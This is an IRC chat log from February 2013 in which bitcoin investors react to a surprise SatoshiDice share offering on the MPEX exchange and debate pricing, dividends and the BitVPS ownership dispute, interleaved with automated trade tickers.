16:12:25 that would be stupid for him Feb 05 16:12:28 not at all Feb 05 16:12:34 that's how MP does it with MPOE Feb 05 16:12:38 he wants to raise more cash so he can take more bets Feb 05 16:12:48 it's not for bets Feb 05 16:12:49 [MPEX] [S.MPOE] 1421 @ 0.0006801 = 0.9664 BTC [-] Feb 05 16:12:50 [MPEX] [S.MPOE] 2079 @ 0.0006801 = 1.4139 BTC [-] Feb 05 16:12:51 and he set the price higher than the last offering Feb 05 16:12:55 it's for one of his shareholders Feb 05 16:13:02 some secret shareholder Feb 05 16:13:04 personal use Feb 05 16:13:12 with higher prices for each next round Feb 05 16:13:21 obviously the price will go back to prior levels Feb 05 16:13:35 it's totally destabilized now Feb 05 16:13:45 but if you increase supply, but keep price the same... Feb 05 16:13:48 what would happen to price Feb 05 16:13:52 1M shares were gobbled up by people who had the spare BTC, now they're being dumped Feb 05 16:14:03 ok Feb 05 16:14:04 for instant profit Feb 05 16:14:11 that's fine Feb 05 16:14:16 the new equilibrium will be in the 0.005 - 0.006 range Feb 05 16:14:20 as long as SDICE gets the capital it needs to expand Feb 05 16:14:27 [HAVELOCK] [SDICE] 8 @ 0.72 = 5.76 BTC [-] Feb 05 16:14:30 they will release more dividends Feb 05 16:14:40 and the value will increase again Feb 05 16:14:43 this isn't for expansion Feb 05 16:15:01 are you sure? Feb 05 16:15:03 the sale was for one of the Satoshi Dice owners Feb 05 16:15:06 yes Feb 05 16:15:12 He said so earlier in this channel Feb 05 16:15:22 oh, similar to how a startup needs to do more offerings so that original investors can liquidate? Feb 05 16:15:30 I suppose Feb 05 16:15:35 For me it was exciting and frustrating, Feb 05 16:15:35 yeah, i'm not worried Feb 05 16:16:02 it's like people are saying sure the golden goose lays golden eggs...but it just won't suck my d*** too Feb 05 16:16:10 i hate it! Feb 05 16:16:14 lol Feb 05 16:16:14 no Feb 05 16:16:14 I spent half my current investment coins yesterday, at about .0072 Feb 05 16:16:18 ah ok Feb 05 16:16:36 so it sucks to know i missed by like 10 hours Feb 05 16:16:39 I reinvested my considerable dividends back in at prices much higher than 0.0044 Feb 05 16:16:41 that is true Feb 05 16:16:50 I reinvested because I believe in the long term value Feb 05 16:16:54 yes so do i Feb 05 16:16:58 that value was properly reflected in the share price Feb 05 16:17:12 the share price was irrationally lowered on a whim by the *owner* Feb 05 16:17:14 i still think that the value is very low Feb 05 16:17:18 it wasn't irrational Feb 05 16:17:21 yes, it's terribly low Feb 05 16:17:31 if you release that much at the current price, you still tank the stock Feb 05 16:17:40 it was irrational. even for his own self interest Feb 05 16:17:41 oh yeah demand is here, have a ton more supply Feb 05 16:17:50 price will stay the same Feb 05 16:17:57 how would that work? Feb 05 16:18:07 and now I'm waiting to hear back from DeadTerra as to whether he was able to make the purchase for me at .0044 Feb 05 16:18:17 is there a way to look that up on MPEX? Feb 05 16:18:22 hmmm Feb 05 16:18:33 (i'm not a mpex member, i am going thru passthroughs) Feb 05 16:18:38 yeah me too for now Feb 05 16:18:48 You don't expect the owner to black swan his own stock Feb 05 16:18:49 through HAVELOCK? Feb 05 16:18:56 it's not a black swan Feb 05 16:18:59 first of all Feb 05 16:19:00 even though it's within his rights Feb 05 16:19:13 it is trading well above both first and second offerings Feb 05 16:19:16 the market was rational - nobody was going to dump 1M shares at 0.0044 Feb 05 16:19:31 he is releasing more shares.... Feb 05 16:19:37 so if you didn't get in, it's not too late Feb 05 16:19:42 it seems like evorhees is saying we were undervaluing the risks Feb 05 16:19:45 I have shares in all the passthrus I think, Havelock was easy to unload last night, there was no action, so I sold all my shares there at over .70 on open bids Feb 05 16:19:54 yes, and he should have done it the was MP does it - buy offering them at a small % higher than the market price Feb 05 16:19:57 it's still riding high this morning too at Havelock Feb 05 16:20:17 is he selling them below the market? Feb 05 16:20:19 dollar cost averaging Feb 05 16:20:38 i bought what i thought was a good deal at 7 Feb 05 16:20:43 horrible deal at 4? Feb 05 16:20:47 [MPEX] [S.DICE] 1500 @ 0.00689996 = 10.3499 BTC [-] Feb 05 16:21:05 or heck yeah, i get to double my position for less Feb 05 16:21:28 i guess everyone is looking at sdice like a growth stock Feb 05 16:21:33 while i would buy and hold it just for the yield Feb 05 16:21:36 the person in the best position to know has signaled in the only way that matters, with his cash, that the price was too high Feb 05 16:21:39 It's a huge growth stock Feb 05 16:21:51 yes it can be Feb 05 16:22:05 but i would not look for return by appreciation, to me that is the bonus Feb 05 16:22:08 It could be worth 10s of millions. 1.2M BTC in handle just last month is *astonishing* Feb 05 16:22:17 of course, it's amazinhg Feb 05 16:22:23 but the yield is ridiculous Feb 05 16:22:25 it just hurts this first time, because it was so abrupt Feb 05 16:22:29 true Feb 05 16:22:34 for a small gambling concern that's restricted to just bitcoiners Feb 05 16:22:34 adjustments are tough Feb 05 16:22:41 now I know that the shares need to stay at values that are more liquid Feb 05 16:22:54 yes, there was too big a spread Feb 05 16:23:03 and holding shares at the end of the month becomes much more valuable than at the beginning Feb 05 16:23:09 and i honestly think he wants to give peple more opportunity to get it Feb 05 16:23:18 lol that is the way its supposed to be Feb 05 16:23:23 the problem is, he has other owners now Feb 05 16:23:27 last dividend day the stock didn't move Feb 05 16:23:28 so he has to consider what we want too Feb 05 16:23:35 non voting shares Feb 05 16:23:37 and I don't care about giving other people the opportunity to get in Feb 05 16:23:43 you vote by buying and selling Feb 05 16:24:44 what do you think the value will be set at for the next 4million shares he's releasing? Feb 05 16:24:48 Anyway, Eric heard our bitching last night. He says he understands and that he didn't think it all through. Feb 05 16:24:58 good to hear Feb 05 16:25:07 So the next tranches will be priced a lot higher Feb 05 16:25:17 i was thinking that he will progressively price them higher Feb 05 16:25:20 unless he really needs the money right then Feb 05 16:25:24 and hopefully he can walk the price back up Feb 05 16:25:28 it was so close to being an awesome move, but was definitely awkward to say the least Feb 05 16:25:39 yes, i mean this was 1.5 traunches Feb 05 16:25:45 sorry: 1/5 Feb 05 16:25:49 yeah Feb 05 16:26:06 so he'll probably due a .005 increase for each one Feb 05 16:26:12 sry Feb 05 16:26:15 .0005 Feb 05 16:26:25 that would be if he thinks about it Feb 05 16:26:29 hehe Feb 05 16:26:49 so i think to increase the float by 50% you need to expect a certain amount of volatility but it will be good in the long run Feb 05 16:27:00 i think peple who are bullish on SDICE will be happy Feb 05 16:27:04 yeah Feb 05 16:27:07 because this is a good long term move Feb 05 16:27:08 i think Feb 05 16:27:09 I am bullish for sure Feb 05 16:27:15 And it did need more liquidity Feb 05 16:27:24 i mean for sure growing pains Feb 05 16:27:37 and maybe i came across as defensive, but i was on reddit and people were all BREACH OF CONTRACT Feb 05 16:27:50 when they wouldn't know how to read a financial document if it was written in crayon Feb 05 16:27:55 but it could have been done more slowly! I like smooth transitions. Feb 05 16:28:03 i suppose that is true Feb 05 16:28:19 he could have sent a letter to the shareholders with his future plans Feb 05 16:28:30 The breach of contract thing was because the relevant clause was a little ambiguous. We had a debated about it here several hours ago. MP cleared it up: no breach. Feb 05 16:29:26 [HAVELOCK] [HIM] 1 @ 13.6 BTC [-] Feb 05 16:29:28 i know Feb 05 16:29:28 [HAVELOCK] [HIM] 1 @ 13.5001 BTC [-] Feb 05 16:29:39 but i mean there are so many scammers around that i guess people are nervous Feb 05 16:29:41 It's still a great deal… but now there's a bit of a trust issue that might keep the price down for a while. Feb 05 16:29:47 but i think that mp and ev are the good guys Feb 05 16:29:53 i hope so Feb 05 16:29:56 i want to get in :) Feb 05 16:30:05 i vote for "lawful evil" :D Feb 05 16:30:06 i have a 1 year mentality with this stock Feb 05 16:30:20 so i can't wait to see where it's at in 2013 Feb 05 16:30:24 i meant 2014 Feb 05 16:31:29 the stock price will be fine too, these shares have one of the best dividends out there, people will keep snatching them up Feb 05 16:31:41 The dividends are awesome, no doubt Feb 05 16:31:41 people would kill for these returns Feb 05 16:31:50 or make a billion dollars a year in a hedge fund Feb 05 16:32:03 Are there other stocks that pay this well? Feb 05 16:32:08 not that i know of Feb 05 16:32:13 mpoe is good Feb 05 16:32:17 and i like btc-bond Feb 05 16:32:19 but riskier right? Feb 05 16:32:26 less risky Feb 05 16:32:26 since it is not quite as risky Feb 05 16:32:31 ah Feb 05 16:32:35 ie. debt vs equity Feb 05 16:32:51 last div was what 10% or so? Feb 05 16:33:21 which i read was higher than it would normally be Feb 05 16:33:32 i was tryiong to follow along but dont knwo much about the stock Feb 05 16:33:46 price has been about 4% monthly yield Feb 05 16:34:08 but profits can change big quickly Feb 05 16:34:35 one month satoshidice lost money and paid no dividends, and the losses came out of next months dividends profits Feb 05 16:35:16 Do you know anything about this JAH stock on Bitfunder? Feb 05 16:35:23 it has pretty high returns Feb 05 16:35:25 mining stuff Feb 05 16:35:42 so any week now the valeu will drop off for it Feb 05 16:35:52 seems likely Feb 05 16:37:27 [HAVELOCK] [HIM] 1 @ 13.5 BTC [-] Feb 05 16:38:34 better to buy anti-mining stuff like iDiffs ;) Feb 05 16:43:02 btw...you can make good money market making sdice Feb 05 16:43:12 i believe the spread is over 30% Feb 05 16:43:44 32.69% to be exact Feb 05 16:44:15 i'm really not sure, the price is all but stable. so you need big reserve both on s.dice and btc side to dip into Feb 05 16:44:29 does anyone know the timeframe for the remaining 4 traunches though? Feb 05 16:44:30 better just go long and receive divs Feb 05 16:44:42 you can do both...but i agree Feb 05 16:45:13 what i meant is you can hopefully just buy and sell, higher than rebuy again lower Feb 05 16:45:35 so put your market making bids in, watch them get filled while your asks sit, then watch another traunch get put up below your bid Feb 05 16:45:42 > On Tue, 05 Feb 13 06:25:53 +0000 S.DICE - 1`000 bought @0.00420000 BTC, Feb 05 16:45:43 lol Feb 05 16:45:47 with the ultimate goal of increasing your position, but also creating liquidity Feb 05 16:45:53 kakobrekla: that was me Feb 05 16:45:55 and i think the plan is not known... evoorhees seems to like to suddenly sneak in the middle of night Feb 05 16:45:58 pigeons?? Feb 05 16:46:00 hehehe Feb 05 16:46:05 makes it exciting Feb 05 16:46:18 you sold me at 0042? Feb 05 16:46:26 no i bought Feb 05 16:46:34 also...the point of market making is...i will always have the current bid and current ask Feb 05 16:46:35 cause i bought too at that. Feb 05 16:46:47 i pasted my filled bid. Feb 05 16:46:48 oh sorry Feb 05 16:46:50 that was you Feb 05 16:46:51 np :) Feb 05 16:46:52 this was me Feb 05 16:46:54 i can go one in front of either side Feb 05 16:46:54 On Tue, 05 Feb 13 06:25:53 +0000 S.DICE - 1`000 bought @0.00420001 BTC Feb 05 16:46:58 haha Feb 05 16:47:09 :) Feb 05 16:47:19 mjr__: hi, please respond to my query Feb 05 16:47:54 mjr__ that's crystal clear to me. just that this market often likes to keep going to one side till the bot exhausts it allotment Feb 05 16:49:31 a market maker would be great Feb 05 16:49:34 [MPEX] [S.MPOE] 7400 @ 0.0006801 = 5.0327 BTC [-] Feb 05 16:49:42 jurov: good point Feb 05 16:49:55 but you'd need pretty deep pockets and a lot of guts Feb 05 16:50:17 also...to the people who felt that they lost value...were you planning on selling, or even more specifically did you have sell orders on the books? Feb 05 16:51:05 i had buy orders on the books, higher than what erik put the shares up at Feb 05 16:51:13 You can make the markets on the passthrus pretty easily Feb 05 16:51:46 so i did lose money there Feb 05 16:51:58 yes true Feb 05 16:52:05 I laid out a fat chunk yesterday at .0072 :/ Feb 05 16:52:21 [MPEX] [S.DICE] 500 @ 0.0052 = 2.6 BTC [-] Feb 05 16:52:27 my only point was that if you were bearish on the stock and trying to get out of the horrible position of making upwards of 30% dividends, then yes you lost Feb 05 16:52:35 but I have another fat chunk to spend today Feb 05 16:52:40 if you actually like the stock and want to keep what you have and get more, this is great news Feb 05 16:53:01 but what was the right play last night, Feb 05 16:53:14 since i believe that most people like this stock, i think they should view the opportunity to get more for less as a good thing Feb 05 16:53:23 on a passthru, Feb 05 16:53:44 1. Liquidate your passthru shares down to about .6 and try to buy in at lower Feb 05 16:54:01 2. Hold shares and buy only with liquid BTC you have Feb 05 16:54:07 Bullish Feb 05 16:54:16 so what was with the lowball ask order last night? Feb 05 16:54:22 i wish i wasnt asleep at the time Feb 05 16:54:26 .0044 Feb 05 16:54:34 a million shares Feb 05 16:54:37 topace_: evorhees sold more shares Feb 05 16:55:03 of his 90%? so now, like 11% are on the market? and 89% are "private" ? Feb 05 16:55:13 pretty much Feb 05 16:55:26 and h plans to release 4 more rounds of 1m Feb 05 16:55:28 topace_: https://bitcointalk.org/index.php?topic=101902.msg1504386#msg1504386 Feb 05 16:55:29 he* Feb 05 16:59:18 public float increases to 15% Feb 05 16:59:30 has anyone seen coins for pizza? Feb 05 16:59:49 [MPEX] [S.MPOE] 10521 @ 0.0006801 = 7.1553 BTC [-] Feb 05 16:59:51 [MPEX] [S.MPOE] 1429 @ 0.00068007 = 0.9718 BTC [-] Feb 05 16:59:52 i think that was a huge win for this community Feb 05 17:00:27 good, bad, or indifferent, "huge win for this community" is fanboi Feb 05 17:00:55 You see the Amazon Coins thing? Feb 05 17:01:02 with no warning whatsoever, that was lame Feb 05 17:01:13 "im releasing shares, first million up.. NOW! GO!" Feb 05 17:01:18 I have seen it, did anyone try it ? Feb 05 17:01:19 thats not how you run a business Feb 05 17:01:30 topace_: we let evorhees know that last night, he says he will try to price more appropriately in the future Feb 05 17:01:43 and no indication when the NEXT ones will come out? Feb 05 17:01:46 just "in the future" Feb 05 17:01:50 within days Feb 05 17:03:35 so that should keep people from buying too high cause who knows what he will price the next ones at Feb 05 17:05:31 pretty much Feb 05 17:08:53 now that we've been through it, I kinda don't want the next 4 tranches to be more than .0044 Feb 05 17:10:22 yes, i want to get in as big as possible Feb 05 17:10:38 at what time was it listed on mpex last night? Feb 05 17:11:09 like 11pm EST, maybe a little later? Feb 05 17:11:47 round then Feb 05 17:17:41 yea, just when i went to bed Feb 05 17:17:42 bastard :p Feb 05 17:19:36 [MPEX] [S.MPOE] 7471 @ 0.00068007 = 5.0808 BTC [-] Feb 05 17:19:38 [MPEX] [S.MPOE] 5929 @ 0.00068 = 4.0317 BTC [-] Feb 05 17:20:12 let the drama continiue. Feb 05 17:21:01 yeah... everyone cashing out of s.mpoe to be ready Feb 05 17:21:11 so, did that huge wall at 44 get bought, or cancelled? Feb 05 17:21:22 it got bought. in 2 hrs or so Feb 05 17:22:03 wow Feb 05 17:22:08 I'm going on the record to say that everyone overreacted last night Feb 05 17:22:47 the stock devaluation is as temporary as the shareholders choose for it to be Feb 05 17:23:38 yea but it also puts an artificial ceiling on the price, until the 5 million are all released Feb 05 17:23:59 because nobody will buy at "what used to be the market rate: ~0.0070" knowing he's going to be releasing more "well below" Feb 05 17:24:12 yep Feb 05 17:25:10 its temporary, sure, but it'll be at least a few weeks before we get back to 0.70.. even if he does one a day for the next 4 days... that'll severly deplete peoples buying power (or the amount they're willing to dump into this) Feb 05 17:25:51 and make you wonder that if evoorhees is willing to sell at that price, maybe that is closer to an accurate pricing of the risks Feb 05 17:26:21 [09:31] <@assbot> [MPEX] [S.DICE] 210000 @ 0.0044 = 924 BTC [+] Feb 05 17:26:21 [09:31] <@assbot> [MPEX] [S.DICE] 227272 @ 0.0044 = 999.9968 BTC [+] Feb 05 17:26:21 [09:37] <@assbot> [MPEX] [S.DICE] 92512 @ 0.0044 = 407.0528 BTC [+] Feb 05 17:26:21 [09:37] <@assbot> [HAVELOCK] [SDICE] 12 @ 0.5321 = 6.3852 BTC [-] Feb 05 17:26:21 [09:44] <@assbot> [MPEX] [S.DICE] 92512 @ 0.0044 = 407.0528 BTC [+] Feb 05 17:26:22 [09:45] <@assbot> [MPEX] [S.DICE] 20 @ 0.0044 = 0.088 BTC [+] Feb 05 17:26:22 [09:46] <@assbot> [MPEX] [S.DICE] 227272 @ 0.0044 = 999.9968 BTC [+] Feb 05 17:26:23 [09:46] <@assbot> [MPEX] [S.DICE] 3 @ 0.0044 = 0.0132 BTC [+] Feb 05 17:26:23 [09:47] <@assbot> [MPEX] [S.MPOE] 2721 @ 0.00069971 = 1.9039 BTC [+] Feb 05 17:26:24 [09:47] <@assbot> [MPEX] [S.MPOE] 2180 @ 0.00069999 = 1.526 BTC [+] Feb 05 17:26:24 [09:47] <@assbot> [MPEX] [S.MPOE] 5449 @ 0.0007 = 3.8143 BTC [+] Feb 05 17:26:25 [09:48] <@assbot> [MPEX] [S.DICE] 16831 @ 0.0044 = 74.0564 BTC [+] Feb 05 17:26:25 [09:50] <@assbot> [MPEX] [S.DICE] 200 @ 0.0044 = 0.88 BTC [+] Feb 05 17:26:26 [09:52] <@assbot> [MPEX] [S.DICE] 17179 @ 0.0044 = 75.5876 BTC [+] Feb 05 17:26:38 StarenseN: apologise Feb 05 17:27:13 around 800K in 20 min when mircea_popescu woke up and proceed the deposit :) Feb 05 17:27:35 wow lol Feb 05 17:27:54 it pays off to keep irc bouncer Feb 05 17:28:29 i woke up, started reading up and it made my day Feb 05 17:29:08 indeed Feb 05 17:29:23 be part of the buyers made mine ^^ Feb 05 17:31:24 jurov: can you do a quick for dummies on CoinBr.MPBPT-E? 0.1005 implies 5% MPBOR? Do we need to know what you bid at to know what number to expect? Feb 05 17:31:38 [MPEX] [S.MPOE] 2685 @ 0.00068408 = 1.8368 BTC [+] Feb 05 17:32:35 pigeons, 0.1005 is just a current price. you buy at that price, I will invest 0.1 into MPOE bond. Feb 05 17:32:48 whatever the price is Feb 05 17:33:22 now, when mpoe liquidates, i'll pay exactly 0.1*MPBOR (or less if there was some loss) Feb 05 17:33:53 so if you got 0.1005 in the end of the month, that would mean that MPOE net profit was only 0.5% Feb 05 17:35:19 thanks, tough for me to follow sometimes Feb 05 17:35:28 if MPOE makes 5% , each share liquidates on 0.105 . if it loses 10%, each share gets 0.09 only Feb 05 17:35:47 ah Feb 05 17:36:17 and that's also reason why doing "normal" assets that will continously run through and just pay divs is difficult Feb 05 17:36:37 we'd have to ask negative dividends if mpoe loses :D Feb 05 17:36:52 better liquidate it every month Feb 05 17:36:58 gotcha Feb 05 17:37:33 need a demmurage feature ;) Feb 05 17:38:14 yes there were some inquiries, but nobody could figure out what to insure it with. ur welcome Feb 05 17:40:01 i need to do a local bitcoin for cash today Feb 05 17:47:43 lol 8k arrived to mpex in past few hours...prepare for wild ride Feb 05 17:47:59 http://blockchain.info/charts/balance?address=1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx Feb 05 17:50:47 just got the good news from my man DeadTerra, he was able to snag some shares for me last night :D Feb 05 17:53:33 where? Feb 05 17:53:43 couldnt wait for that one Feb 05 17:54:21 ic in your thread Feb 05 18:05:28 [HAVELOCK] [KCIM] 1 @ 0.99 BTC [+] Feb 05 18:11:56 [MPEX] [S.MPOE] 10251 @ 0.00068589 = 7.0311 BTC [+] Feb 05 18:14:00 reddit really is where the idiots of the internet hang out Feb 05 18:17:23 juror - do you have one of those blockchain.info urls for sdice 50% I tried to replace the address but not getting a chart Feb 05 18:17:33 jurov Feb 05 18:17:41 at least the 4chan people don't take themselves seriously Feb 05 18:18:07 aiball, search for the address normally Feb 05 18:18:19 and then click the icon next to Balance to get graph Feb 05 18:19:44 [MPEX] [S.MPOE] 4321 @ 0.00069967 = 3.0233 BTC [+] Feb 05 18:19:46 [MPEX] [S.MPOE] 10702 @ 0.00069999 = 7.4913 BTC [+] Feb 05 18:22:20 [MPEX] [S.DICE] 200 @ 0.00689996 = 1.38 BTC [+] Feb 05 18:22:32 lol Feb 05 18:29:36 [MPEX] [S.MPOE] 4321 @ 0.00069981 = 3.0239 BTC [-] Feb 05 18:29:38 [MPEX] [S.MPOE] 9298 @ 0.00069999 = 6.5085 BTC [+] Feb 05 18:29:40 [MPEX] [S.MPOE] 581 @ 0.00069999 = 0.4067 BTC [+] Feb 05 18:35:44 https://bitcointalk.org/index.php?topic=101902.msg1505462#msg1505462 Feb 05 18:36:29 moar shares please Feb 05 18:36:51 .0055 Feb 05 18:36:53 uh oh Feb 05 18:37:03 is that good or bad? Feb 05 18:37:20 it will never sell Feb 05 18:37:25 it should be like .0034 :) Feb 05 18:37:29 lol Feb 05 18:37:34 man I can't win Feb 05 18:37:37 or .0046 Feb 05 18:37:39 :) Feb 05 18:37:55 well look... smart investors should want me to sell it as low as possible Feb 05 18:38:01 no shit Feb 05 18:38:03 so you bugpowder are being very rational, thank you Feb 05 18:38:57 i wish i didn't sleep through the last batch Feb 05 18:39:40 and i wish i'll be able to sleep tonight... it will be 4am here Feb 05 18:40:08 just place a bid up Feb 05 18:40:09 ;;calc 1e6*.0055 Feb 05 18:40:09 Error: invalid syntax (, line 1) Feb 05 18:40:15 ;;calc 1e6*0.0055 Feb 05 18:40:15 Error: invalid syntax (, line 1) Feb 05 18:40:18 ;;calc 1e6 * 0.0055 Feb 05 18:40:19 Error: invalid syntax (, line 1) Feb 05 18:40:19 5500 Feb 05 18:40:32 and 8000 already deposited on mpex lol Feb 05 18:40:38 god damn it Feb 05 18:41:23 all five are going to go quickly Feb 05 18:41:24 lol dumping? Feb 05 18:42:02 one min Feb 05 18:42:23 EskimoBob_afk: why did you do a second offering of ART? Feb 05 18:45:30 yep Feb 05 18:47:27 back, sorry Feb 05 18:47:45 eskimo - releasing 5% of the shares on mpex is hardly "dumping" Feb 05 18:48:14 further, as I've mentioned, there are a few private holders. Don't assume that this 5% is from me. Feb 05 18:48:37 evoorhees: i sent you pm if you have time Feb 05 18:48:58 eskimo - the volume is not based on those wales alone Feb 05 18:49:04 evoorhees: no need to argue with him... for him we re all just MP's sockpuppets anyway Feb 05 18:49:22 the base volume is increasingly substantially, and the whales seem to come out for a week or two each month Feb 05 18:49:35 I don't mind explaining my actions to him Feb 05 18:49:45 and if he's an owner, then I owe it to him Feb 05 18:50:22 And there is a big difference between me and Trendon. One business was opaque, the other transparent. Feb 05 18:50:31 nobody knew how he was making "profits" Feb 05 18:50:40 and yet they bought anyway Feb 05 18:50:50 SD is a gambling site, it earns 1.9%, easy Feb 05 18:51:54 you're wrong Feb 05 18:52:02 but it's good to be skeptical Feb 05 18:52:59 If everyone in the bitcoin community was as skeptical as you, it'd be a healthier community Feb 05 18:54:11 and honestly, the whales do look suspicious... or at least I thought so until I went to Macau and saw people playing baccarat for 36 hrs straight with $50,000 chips Feb 05 18:57:19 evoorhees quick question, are you belgian ? Any chance to see you back in belgium to promote bitcoin or ? Feb 05 18:57:40 the name is dutch Feb 05 18:57:43 but I've never been there Feb 05 18:57:50 you're american ? Feb 05 18:57:53 only been to london, paris, and vienna in europe Feb 05 18:57:55 yeah Feb 05 18:58:00 unfortunately Feb 05 18:58:14 alright, belgium has a dutch part as well so that's why i asked myself Feb 05 18:58:32 evoorhees, i can't imagine such people patiently bearing with bitcoin-qt.. or do they just use online wallet? Feb 05 18:58:42 these whales Feb 05 18:59:40 maybe those whales don't even exist. Feb 05 19:00:19 [BTCTC] [GSDPT] 10 @ 0.0056 = 0.056 BTC [-] Feb 05 19:03:53 [BTCTC] [GSDPT] 3380 @ 0.0056 = 18.928 BTC [-] Feb 05 19:04:47 [BTCTC] [GSDPT] 2509 @ 0.0056 = 14.0504 BTC [-] Feb 05 19:07:08 evoorhees are the 3 other batchs for this week as well ? Feb 05 19:10:09 star trek IV was the one with the whales Feb 05 19:11:13 Thanks again DeaDTerra Feb 05 19:11:31 the .0001 markup on the passthroughs works nicely Feb 05 19:11:39 [17:41] evoorhees: why do you sell? Feb 05 19:11:44 did you answer? Feb 05 19:11:58 yeah Feb 05 19:12:04 "don't assume it was my shares" Feb 05 19:13:13 I cant blame you at all, its a modest markup surely Feb 05 19:13:39 Actually... consider that another private owner may have sold me more than 5%, and thus I actually increased my position Feb 05 19:14:06 haha Feb 05 19:14:31 at a good price so Feb 05 19:14:36 While I'm sure we could come up with a number of reasons, I'm betting Bob wants the exact one Feb 05 19:16:14 evoorhees: so you and several partners own the unreleased S.DICE shares? And you and the other owners can sell your interest because you're selling it to the public via shares? Is that what makes it different from rapeghost selling his interest in S.BVPS? Feb 05 19:16:45 I don't know the rapeghost case Feb 05 19:16:51 mircea_popescu: or did rapeghost have different ownership change provisions in its contract with mpex than satoshi dice has Feb 05 19:17:10 but yes me and several others own the (now 89%) of S.DICE that is not on MPEX Feb 05 19:17:39 I thought it was on MPEX ;) Feb 05 19:18:01 i see the difference Feb 05 19:18:10 bitvps was 100% public Feb 05 19:18:12 iirc Feb 05 19:18:28 [HAVELOCK] [KCIM] 1 @ 1 BTC [+] Feb 05 19:18:32 where is the original bitvps contract Feb 05 19:18:45 yes to be technically accurate, I have 39m shares of s.dice on mpex (these became available a few days ago, which was 30 days after the final sale of the ipo shares) Feb 05 19:18:46 oh i didnt know that. ithought all mpex stocks were non voting shares enforced by keeping 51% of the shares private Feb 05 19:19:06 so 50m shares are just "theoretical" and 50m shares are on MPEX Feb 05 19:19:16 correct deadterra Feb 05 19:19:20 yay for fun maths! Feb 05 19:19:42 pigeons - yes that's true Feb 05 19:19:46 I can't sell 50% on mpex Feb 05 19:19:53 only 49.999% or whatever Feb 05 19:20:13 jcpham: (c) The Directors warrant that no further shares will be offered by them for a period of 30 days from the date these offered shares are sold. The Directors further warrant that they will never sell more than half the total shares. Feb 05 19:20:20 http://mpex.co/?mpsic=S.BVPS Feb 05 19:20:42 looks like the directors fucked up Feb 05 19:20:46 iana though Feb 05 19:20:53 jcpham how? Feb 05 19:21:11 evoorhees: rapeghost sold more than half the shares Feb 05 19:21:19 oh thought you were talking about s.dice Feb 05 19:21:26 no evoorhees Feb 05 19:21:32 [BTCTC] [GSDPT] 5000 @ 0.0056 = 28 BTC [-] Feb 05 19:21:32 what pigeons said Feb 05 19:22:03 the previous owner of bitvps entered into a contract and then broke it Feb 05 19:22:06 iana though Feb 05 19:22:17 was that on glbse? Feb 05 19:22:25 mpex Feb 05 19:22:36 he wasn't allowed to sell Feb 05 19:22:37 and then did Feb 05 19:22:46 [BTCTC] [GSDPT] 1 @ 0.0055 BTC [-] Feb 05 19:22:47 that's how it reads to me Feb 05 19:22:55 all without even consulting the other major owner Feb 05 19:23:02 [BTCTC] [GSDPT] 775 @ 0.0056 = 4.34 BTC [+] Feb 05 19:23:04 so technically, one could argue the sale wasn't legal Feb 05 19:23:09 rg did not sold it Feb 05 19:23:10 that's backstory but... yeah Feb 05 19:23:17 he didn't have enough votes. Feb 05 19:23:22 rg just left everything to new owhers for free Feb 05 19:23:29 including his own gpg key Feb 05 19:23:43 ^ Feb 05 19:23:43 he isn't allowed to do that either. Feb 05 19:23:48 selling for 0 consideration is still 0. Feb 05 19:23:51 err, selling Feb 05 19:23:55 hnope Feb 05 19:24:05 he didn't just give. Feb 05 19:24:19 pigeons: technically, nothing in bitcoin is sold unless there is $1. Feb 05 19:24:21 well, good enough for me Feb 05 19:24:21 but there isn't. Feb 05 19:24:43 imsaguy what do you mean? Feb 05 19:24:48 cause he wanted hard to be employed, have the career and be able to fire people instead of boring task of running bitvps :DDD Feb 05 19:24:53 no consideration can be more than currency/dollars Feb 05 19:25:10 evoorhees, its just barter unless there's dollars. Feb 05 19:25:30 but at any rate, everyone acknowledges th ownership transfer and its working out well for everyone except the investors (that leaves customers and new owners) Feb 05 19:25:38 it seems to me that similar to what dell has just done Feb 05 19:25:43 bitvps would need to do the same Feb 05 19:25:48 aye Feb 05 19:25:50 buyout, go private Feb 05 19:25:51 no barter is contractual sale Feb 05 19:26:05 the old shareholders would need to be bought out. Feb 05 19:26:08 to meet the mpex contract, that is Feb 05 19:26:11 and you can't jus force them to sell Feb 05 19:26:14 unless its in the contract Feb 05 19:26:21 and it isn't Feb 05 19:26:33 hey, who expected half as much from rg anyway Feb 05 19:26:57 no offense at all rg Feb 05 19:27:06 offense intended rg Feb 05 19:27:19 the gpg key thing is not excusable Feb 05 19:27:23 i can't trust him Feb 05 19:27:33 cant trust his old key Feb 05 19:27:37 aye Feb 05 19:27:40 i don't mind rg at this point, worse enw owners are equally inept Feb 05 19:27:41 he isn't his key Feb 05 19:27:47 cant trust him not to break contracts, thats true Feb 05 19:28:01 they still didn't decide whether they'll list or not Feb 05 19:28:04 I wanna know what grubles got out of this Feb 05 19:28:09 "probably on btct" Feb 05 19:28:20 besides the shaft Feb 05 19:28:27 imsaguy/query grubles Feb 05 19:28:30 shit Feb 05 19:28:32 that's why i figure Feb 05 19:28:57 i think it was just time for both of them to move on, and people did get screwed and it certainly didnt have to be that way, but oh well Feb 05 19:29:00 seems like i have that info in a/query log Feb 05 19:29:05 what "he got" Feb 05 19:29:18 meanwhile.. Feb 05 19:29:21 screw pirate Feb 05 19:29:25 yeah Feb 05 19:29:33 dude fucked you Feb 05 19:29:43 he fucked many people Feb 05 19:29:44 BTCTC takes forever to confirm deposits Feb 05 19:29:57 evil Feb 05 19:30:06 my own damn fault Feb 05 19:30:43 its too much damn hassle paying lenders out of my 10% weekly profits, let's do "trust accounts" Feb 05 19:31:04 pigeons: its one of those thigns that made sense at the time when a person is tied up into the story Feb 05 19:31:19 but in hindsight, dumb as hell Feb 05 19:31:21 i was just looking through my grubles chat logs Feb 05 19:32:10 so 24.4 btc @ 8.2/per Feb 05 19:32:10 ill have pirate send them to you, cool? Feb 05 19:32:10 yep that works Feb 05 19:32:13 ^ retarded Feb 05 19:32:34 oh, I had much better ones Feb 05 19:32:42 until Western Digital failed me Feb 05 19:32:42 treasure trove of lulz Feb 05 19:33:15 some of these are pretty old I'm wondering why i still have them Feb 05 19:33:28 sentimental reasons Feb 05 19:33:56 so i can sue when my name isn't in the credits Feb 05 19:34:10 there we go Feb 05 19:34:13 let's make a movie Feb 05 19:34:18 who shall we cast as pirate? Feb 05 19:34:28 a fat guy Feb 05 19:38:32 [MPEX] [S.MPOE] 4321 @ 0.00069981 = 3.0239 BTC [-] Feb 05 19:38:34 [MPEX] [S.MPOE] 2779 @ 0.00069999 = 1.9453 BTC [+] Feb 05 19:39:29 [HAVELOCK] [SDICE] 5 @ 0.665 = 3.325 BTC [-] Feb 05 19:39:30 